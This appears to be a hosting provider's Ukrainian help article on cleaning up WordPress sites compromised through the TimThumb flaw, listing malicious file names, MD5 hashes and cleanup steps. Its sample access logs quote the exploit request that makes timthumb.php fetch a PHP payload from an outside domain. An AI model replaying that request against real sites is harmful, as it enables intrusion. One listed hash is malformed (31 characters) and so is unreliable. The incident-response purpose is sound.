Порушення безпеки WordPress: TimThumb

TimThumb – це засіб змінення розміру зображень у темах і плагінах WordPress. У старих версіях TimThumb існує вразливість системи безпеки, яка дає змогу зловмисникам завантажувати шкідливі файли з інших веб-сайтів. Завантаживши перший такий файл, далі зловмисник може передавати в облікові записи хостингу інший небезпечний вміст.

Докладні відомості про порушення безпеки та способи боротьби з ними див. тут: Що робити, якщо веб-сайт зламано?.

Ознаки порушення безпеки

Окрім ознак, наведених у статті Що робити, якщо веб-сайт зламано?, цей тип порушення безпеки сайту можна визначити по файлах із наведеними нижче шаблонами імені в каталозі плагіна облікового запису.

  • external_[MD5-геш].php, наприклад external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [MD5-геш].php, наприклад 7eebe45bde5168488ac4010f0d65cea8.php

Приклади можливих MD5-гешей див. в розділі Відомі зловмисні файли MD5SUM цієї статті.

У кореневому каталозі веб-сайту можуть також міститися такі файли (докладніше):

  • x.txt
  • logx.txt

Способи вирішення проблеми

Ви повинні вилучити всі файли з порушеною безпекою та шкідливі файли. Перш ніж робити це, радимо створити резервну копію веб-сайту (докладніше).

Пошук шкідливих файлів

Шкідливі файли, завантажені через уразливість системи безпеки TimThumb, зазвичай розташовано в одному з наведених нижче каталогів /theme або /plugin:

  • /tmp
  • /cache
  • /images

Приклади розташувань шкідливих файлів:

[кореневий_каталог_веб-сайту]/wp-content/themes/[theme with vulnerable TimThumb]/cache/images/

Приклади імен шкідливих файлів у цих розташуваннях:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Файли x.txt і logx.txt міститимуть інформацію про час створення (через уразливість системи безпеки TimThumb) і розташування шкідливого файлу в обліковому записі хостингу. Ці дані допоможуть визначити файли, які потрібно вилучити, і їх розташування. Проте на підставі цієї інформації ви не зможете визначити всі файли, які потрібно вилучити.

Приклад:

Day : Thu, 11 Apr 2013 06:21:15 -0700
IP: X.X.X.X
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[тема з вразливістю TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Файли, які потрібно вилучити

Створивши резервну копію сайту, вилучіть такі файли:

  • x.txt
  • logx.txt
  • external_[MD5-геш].php, наприклад external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [MD5-геш].php, наприклад 7eebe45bde5168488ac4010f0d65cea8.php
  • Інші шкідливі PHP-файли, окрім файлів із MD5-гешем в імені.

Файли можна вилучити через FTP (докладніше) або диспетчер файлів на панелі керування облікового запису хостингу (докладніше).

Ви також повинні:

  • оновити всі теми й плагіни до останньої версії;
  • замініть усі екземпляри TimThumb.php на найновіші версії, доступні тут.

Технічні відомості

Приклад журналів HTTP

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[тема, завантажена через уразливість системи безпеки TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[тема, завантажена через уразливість системи безпеки TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[тема, завантажена через уразливість системи безпеки TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[тема, завантажена через уразливість системи безпеки TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

Відомі зловмисні файли MD5SUM

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Інші зловмисні файли

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Чи була ця стаття корисною?
Дякуємо за ваш відгук. Щоб звернутися до представника служби підтримки, скористайтеся телефонним номером або чатом (див. вище).
Ми раді, що змогли допомогти! Що ще ми можемо для вас зробити?
Нам дуже прикро. Повідомте нам, що викликало замішання або чому рішення не усунуло вашу проблему.